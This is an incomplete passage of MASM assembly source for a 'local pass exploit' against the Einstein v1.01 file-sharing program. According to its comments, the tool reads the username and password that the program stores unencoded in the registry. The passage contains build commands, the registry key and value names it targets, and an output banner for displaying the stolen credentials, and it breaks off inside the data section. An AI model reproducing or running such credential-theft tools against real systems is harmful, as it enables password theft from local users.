1 ; Nothing Special other than the program doesnt encode the user/pass in the registry.
2 ; Einstein v1.01 − http://www.Bfriendly.com some crappy file school sharing program
3 ; made because i think C is overkill for these types of local exploits,
4 ; shit we can does this in vbs/bat too if ya want
5 ;Compiles in Masm
6 ;c:\Masm32\BIN\ml.exe /c /coff /Cp einstein.asm
7 ;c:\Masm32\BIN\Link.exe /SUBSYSTEM:CONSOLE /LIBPATH:c:\MASM32\lib einstein.obj
8
9 .386
10 .model flat, stdcall
11 option casemap :none
12 include \masm32\include\windows.inc
13 include \masm32\include\user32.inc
14 include \masm32\include\kernel32.inc
15 include \masm32\include\shell32.inc
16 include \masm32\include\advapi32.inc
17 include \masm32\include\masm32.inc
18 includelib \masm32\lib\user32.lib
19 includelib \masm32\lib\kernel32.lib
20 includelib \masm32\lib\shell32.lib
21 includelib \masm32\lib\advapi32.lib
22 includelib \masm32\lib\masm32.lib
23 literal MACRO quoted_text:VARARG
24 LOCAL local_text
25 .data
26 local_text db quoted_text,0
27 .code
28 EXITM <local_text>
29 ENDM
30 SADD MACRO quoted_text:VARARG
31 EXITM <ADDR literal(quoted_text)>
32 ENDM
33 .data
34 SubKey db "Software\\einstein",0
35 szUser db "username",0
36 szPass db "password",0
37 noExeem db "Einstein v1.01 is not installed on your pc!",0
38 Theoutput db ’_______________________________________________________________’,13,10
39 db ’* Einstein v1.01 Local Pass Exploit *’,13,10
40 db ’* Based On Kozans code in C *’,13,10
41 db ’* by illwill − xillwillx@yahoo.com *’,13,10
42 db ’*_____________________________________________________________*’,13,10
43 db ’ UserName: %s ’,13,10
44 db ’ Password: %s